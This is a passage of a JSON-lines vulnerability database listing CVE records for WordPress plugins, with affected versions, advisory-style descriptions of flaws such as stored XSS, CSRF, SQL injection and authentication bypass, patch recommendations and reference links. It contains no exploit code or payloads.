.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2368462%40erp&new=2368462%40erp&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2368462%40erp&new=2368462%40erp&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4703","slug":"one-page-express-companion","versionImpact":"1.6.37","versionEndExcluding":"1.6.38","description":"The One Page Express Companion plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's one_page_express_contact_form shortcode in all versions up to, and including, 1.6.37 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.6.38, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a00a5c41-b211-45e4-acf8-01fd8e64b1c0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a00a5c41-b211-45e4-acf8-01fd8e64b1c0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3097699\\\/one-page-express-companion\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3097699\\\/one-page-express-companion\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3410","slug":"dn-footer-contacts","versionImpact":"1.6.2","versionEndExcluding":"1.6.3","description":"The DN Footer Contacts WordPress plugin before 1.6.3 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 1.6.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e2067637-45f3-4b42-96ca-85867c4c0409\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e2067637-45f3-4b42-96ca-85867c4c0409\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9212","slug":"sku-for-woocommerce","versionImpact":"1.6.2","versionEndExcluding":"1.6.3","description":"The SKU Generator for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.6.2. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.6.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sku-for-woocommerce\\\/tags\\\/1.6.2\\\/includes\\\/settings\\\/class-wc-sku-tools-regenerator.php#L43\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sku-for-woocommerce\\\/tags\\\/1.6.2\\\/includes\\\/settings\\\/class-wc-sku-tools-regenerator.php#L43\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f59ccb78-722b-490b-874e-7026afc3511b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f59ccb78-722b-490b-874e-7026afc3511b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10547","slug":"wp-membership","versionImpact":"1.6.2","versionEndExcluding":"1.6.3","description":"The WP Membership plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the user_profile_image_upload() function in all versions up to, and including, 1.6.2. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 1.6.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/664e6e2a-faa1-4609-b250-d7e94c5d5a04?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/664e6e2a-faa1-4609-b250-d7e94c5d5a04?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/wp-membership\\\/10066554\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/wp-membership\\\/10066554\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10670","slug":"primary-addon-for-elementor","versionImpact":"1.6.2","versionEndExcluding":"1.6.3","description":"The Primary Addon for Elementor plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.6.2 via the [prim_elementor_template] shortcode due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from private or draft posts created with Elementor that they should not have access to.","recommendation":"Update to version 1.6.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3197298%40primary-addon-for-elementor&new=3197298%40primary-addon-for-elementor&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3197298%40primary-addon-for-elementor&new=3197298%40primary-addon-for-elementor&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/636bd8ce-4737-4117-9581-42c7dcb3ad22?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/636bd8ce-4737-4117-9581-42c7dcb3ad22?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12462","slug":"yogo-booking","versionImpact":"1.6.2","versionEndExcluding":"1.6.3","description":"The YOGO Booking plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'yogo-calendar' shortcode in all versions up to, and including, 1.6.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.6.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yogo-booking\\\/trunk\\\/src\\\/shortcodes.php#L13\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yogo-booking\\\/trunk\\\/src\\\/shortcodes.php#L13\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/yogo-booking\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/yogo-booking\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/151b0aa9-c5c9-48ab-8b73-22ee42666824?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/151b0aa9-c5c9-48ab-8b73-22ee42666824?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3249","slug":"zita-site-library","versionImpact":"1.6.2","versionEndExcluding":"1.6.3","description":"The Zita Elementor Site Library plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the import_xml_data, xml_data_import, import_option_data, import_widgets, and import_customizer_settings functions in all versions up to, and including, 1.6.2. This makes it possible for authenticated attackers, with subscriber-level access and above, to create pages, update certain options, including WooCommerce page titles and Elementor settings, import widgets, and update the plugin's customizer settings and the WordPress custom CSS. NOTE: This vulnerability was partially fixed in version 1.6.2.","recommendation":"Update to version 1.6.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/62bc3794-a2c2-4c1a-b1c9-2be6e2526635?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/62bc3794-a2c2-4c1a-b1c9-2be6e2526635?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3100431\\\/zita-site-library\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3100431\\\/zita-site-library\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3105478\\\/zita-site-library\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3105478\\\/zita-site-library\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2761","slug":"user-activity-log","versionEndExcluding":"1.6.3","description":"The User Activity Log WordPress plugin before 1.6.3 does not properly sanitise and escape the `txtsearch` parameter before using it in a SQL statement in some admin pages, leading to a SQL injection exploitable by high privilege users such as admin.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8c82d317-f9f9-4e25-a7f1-43edb77e8aba\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8c82d317-f9f9-4e25-a7f1-43edb77e8aba\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0909","slug":"anonymous-restricted-content","versionImpact":"1.6.2","versionEndExcluding":"1.6.3","description":"The Anonymous Restricted Content plugin for WordPress is vulnerable to information disclosure in all versions up to, and including, 1.6.2. This is due to insufficient restrictions through the REST API on the posts\/pages that protections are being place on. This makes it possible for unauthenticated attackers to access protected content.","recommendation":"Update to version 1.6.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f478ff7c-7193-4c59-a84f-c7cafff9b6c0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f478ff7c-7193-4c59-a84f-c7cafff9b6c0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3030199%40anonymous-restricted-content&new=3030199%40anonymous-restricted-content&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3030199%40anonymous-restricted-content&new=3030199%40anonymous-restricted-content&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3030608%40anonymous-restricted-content&new=3030608%40anonymous-restricted-content&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3030608%40anonymous-restricted-content&new=3030608%40anonymous-restricted-content&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12046","slug":"medical-addon-for-elementor","versionImpact":"1.6.2","versionEndExcluding":"1.6.3","description":"The Medical Addon for Elementor plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 1.6.2 via the 'namedical_elementor_template' shortcode due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Contributor-level access and above, to read the content of draft, pending, and private posts.","recommendation":"Update to version 1.6.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/medical-addon-for-elementor\\\/trunk\\\/elementor\\\/lib\\\/lib.php#L12\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/medical-addon-for-elementor\\\/trunk\\\/elementor\\\/lib\\\/lib.php#L12\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/medical-addon-for-elementor\\\/trunk\\\/elementor\\\/lib\\\/lib.php#L24\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/medical-addon-for-elementor\\\/trunk\\\/elementor\\\/lib\\\/lib.php#L24\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3230459\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3230459\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d5f4c4ec-bdb5-4f27-8ee3-060de9b62502?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d5f4c4ec-bdb5-4f27-8ee3-060de9b62502?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4634","slug":"header-footer-elementor","versionImpact":"1.6.28","versionEndExcluding":"1.6.29","description":"The Elementor Header & Footer Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018hfe_svg_mime_types\u2019 function in versions up to, and including, 1.6.28 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.6.29, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f44bb823-bbf3-413b-82b5-a351609270bf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f44bb823-bbf3-413b-82b5-a351609270bf?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/header-footer-elementor\\\/tags\\\/1.6.28\\\/inc\\\/widgets-manager\\\/class-widgets-loader.php#L156\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/header-footer-elementor\\\/tags\\\/1.6.28\\\/inc\\\/widgets-manager\\\/class-widgets-loader.php#L156\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3086402\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3086402\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3609","slug":"reviewx","versionImpact":"1.6.27","versionEndExcluding":"1.6.28","description":"The ReviewX \u2013 Multi-criteria Rating & Reviews for WooCommerce plugin for WordPress is vulnerable to unauthorized deletion of data due to a missing capability check on the reviewx_remove_guest_image function in all versions up to, and including, 1.6.27. This makes it possible for authenticated attackers, with subscriber access and above, to delete attachments.","recommendation":"Update to version 1.6.28, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f8152adf-1ca9-4a19-b539-39e257ab94c8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f8152adf-1ca9-4a19-b539-39e257ab94c8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3086273%40reviewx%2Ftrunk&old=3054184%40reviewx%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3086273%40reviewx%2Ftrunk&old=3054184%40reviewx%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2619","slug":"header-footer-elementor","versionImpact":"1.6.26","versionEndExcluding":"1.6.27","description":"The Elementor Header & Footer Builder for WordPress is vulnerable to HTML Injection in all versions up to, and including, 1.6.26 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author-level permissions and above, to inject arbitrary HTML in pages that will be shown whenever a user accesses an injected page.","recommendation":"Update to version 1.6.27, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/689eb95b-2f72-4aa4-9f21-6ae186346061?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/689eb95b-2f72-4aa4-9f21-6ae186346061?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/header-footer-elementor\\\/tags\\\/1.6.25\\\/admin\\\/class-hfe-admin.php#L74\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/header-footer-elementor\\\/tags\\\/1.6.25\\\/admin\\\/class-hfe-admin.php#L74\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/header-footer-elementor\\\/tags\\\/1.6.25\\\/admin\\\/class-hfe-admin.php#L220\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/header-footer-elementor\\\/tags\\\/1.6.25\\\/admin\\\/class-hfe-admin.php#L220\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3070659%40header-footer-elementor%2Ftrunk&old=3053177%40header-footer-elementor%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3070659%40header-footer-elementor%2Ftrunk&old=3053177%40header-footer-elementor%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2237","slug":"wp-realestate","versionImpact":"1.6.26","versionEndExcluding":"1.6.27","description":"The WP RealEstate plugin for WordPress, used by the Homeo theme, is vulnerable to authentication bypass in all versions up to, and including, 1.6.26. This is due to insufficient role restrictions in the 'process_register' function. This makes it possible for unauthenticated attackers to register an account with the Administrator role.","recommendation":"Update to version 1.6.27, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/homeo-real-estate-wordpress-theme\\\/26372986#item-description__updates-history\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/homeo-real-estate-wordpress-theme\\\/26372986#item-description__updates-history\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f6f7bff6-3bc3-4572-97fd-a039d54ac0ff?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f6f7bff6-3bc3-4572-97fd-a039d54ac0ff?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2618","slug":"header-footer-elementor","versionImpact":"1.6.26","versionEndExcluding":"1.6.26.1","description":"The Elementor Header & Footer Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the size attribute in all versions up to, and including, 1.6.26 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.6.26.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a780ce1b-0758-42ef-88e7-ff8d921eca6e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a780ce1b-0758-42ef-88e7-ff8d921eca6e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/header-footer-elementor\\\/tags\\\/1.6.26\\\/inc\\\/widgets-manager\\\/widgets\\\/class-page-title.php#L494\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/header-footer-elementor\\\/tags\\\/1.6.26\\\/inc\\\/widgets-manager\\\/widgets\\\/class-page-title.php#L494\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/header-footer-elementor\\\/tags\\\/1.6.26\\\/inc\\\/widgets-manager\\\/widgets\\\/class-site-title.php#L478\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/header-footer-elementor\\\/tags\\\/1.6.26\\\/inc\\\/widgets-manager\\\/widgets\\\/class-site-title.php#L478\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8795","slug":"ba-book-everything","versionImpact":"1.6.20","versionEndExcluding":"1.6.21","description":"The BA Book Everything plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.6.20. This is due to missing or incorrect nonce validation on the my_account_update() function. This makes it possible for unauthenticated attackers to update a user's account details via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. This can be leveraged to reset a user's password and gain access to their account.","recommendation":"Update to version 1.6.21, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b691560e-e285-467c-9d52-1620c63de1f0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b691560e-e285-467c-9d52-1620c63de1f0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ba-book-everything\\\/tags\\\/1.6.20\\\/includes\\\/class-babe-users.php#L203\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ba-book-everything\\\/tags\\\/1.6.20\\\/includes\\\/class-babe-users.php#L203\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ba-book-everything\\\/tags\\\/1.6.20\\\/includes\\\/class-babe-my-account.php#L562\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ba-book-everything\\\/tags\\\/1.6.20\\\/includes\\\/class-babe-my-account.php#L562\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3152728%40ba-book-everything&new=3152728%40ba-book-everything&sfp_email=&sfph_mail=#file3\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3152728%40ba-book-everything&new=3152728%40ba-book-everything&sfp_email=&sfph_mail=#file3\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8794","slug":"ba-book-everything","versionImpact":"1.6.20","versionEndExcluding":"1.6.21","description":"The BA Book Everything plugin for WordPress is vulnerable to arbitrary password reset in all versions up to, and including, 1.6.20. This is due to the reset_user_password() function not verifying a user's identity prior to setting a password. This makes it possible for unauthenticated attackers to reset any user's passwords, including administrators. It's important to note that the attacker will not have access to the generated password, therefore, privilege escalation is not possible.","recommendation":"Update to version 1.6.21, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4e261b0e-5ca3-4f5c-acc0-41abee31b148?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4e261b0e-5ca3-4f5c-acc0-41abee31b148?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ba-book-everything\\\/tags\\\/1.6.20\\\/includes\\\/class-babe-users.php#L266\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ba-book-everything\\\/tags\\\/1.6.20\\\/includes\\\/class-babe-users.php#L266\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ba-book-everything\\\/tags\\\/1.6.20\\\/includes\\\/class-babe-my-account.php#L610\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ba-book-everything\\\/tags\\\/1.6.20\\\/includes\\\/class-babe-my-account.php#L610\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3152728\\\/ba-book-everything\\\/trunk\\\/includes\\\/class-babe-users.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3152728\\\/ba-book-everything\\\/trunk\\\/includes\\\/class-babe-users.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36837","slug":"themegrill-demo-importer","versionImpact":"1.6.1","versionEndExcluding":"1.6.2","description":"The ThemeGrill Demo Importer plugin for WordPress is vulnerable to authentication bypass due to a missing capability check on the reset_wizard_actions function in versions 1.3.4 through 1.6.1. This makes it possible for authenticated attackers to reset the WordPress database. After which, if there is a user named 'admin', the attacker will become automatically logged in as an administrator.","recommendation":"Update to version 1.6.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8c0dc694-854e-4f96-8c2d-7251c41a3ee9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8c0dc694-854e-4f96-8c2d-7251c41a3ee9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.webarxsecurity.com\\\/critical-issue-in-themegrill-demo-importer\\\/\",\"name\":\"https:\\\/\\\/www.webarxsecurity.com\\\/critical-issue-in-themegrill-demo-importer\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.openwall.com\\\/lists\\\/oss-security\\\/2020\\\/02\\\/19\\\/1\",\"name\":\"https:\\\/\\\/www.openwall.com\\\/lists\\\/oss-security\\\/2020\\\/02\\\/19\\\/1\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/raw.githubusercontent.com\\\/themegrill\\\/themegrill-demo-importer\\\/master\\\/CHANGELOG.txt\",\"name\":\"https:\\\/\\\/raw.githubusercontent.com\\\/themegrill\\\/themegrill-demo-importer\\\/master\\\/CHANGELOG.txt\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2704","slug":"bp-social-connect","versionEndExcluding":"1.6.2","description":"The BP Social Connect plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 1.5. This is due to insufficient verification on the user being supplied during a Facebook login through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the email.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/44c96df2-530a-4ebe-b722-c606a7b135f9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/44c96df2-530a-4ebe-b722-c606a7b135f9?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bp-social-connect\\\/tags\\\/1.5\\\/includes\\\/social\\\/facebook\\\/class.facebook.php#L138\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bp-social-connect\\\/tags\\\/1.5\\\/includes\\\/social\\\/facebook\\\/class.facebook.php#L138\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bp-social-connect\\\/tags\\\/1.5\\\/includes\\\/social\\\/facebook\\\/class.facebook.php#L188\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bp-social-connect\\\/tags\\\/1.5\\\/includes\\\/social\\\/facebook\\\/class.facebook.php#L188\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2914042%40bp-social-connect%2Ftrunk&old=1904372%40bp-social-connect%2Ftrunk&sfp_email=&sf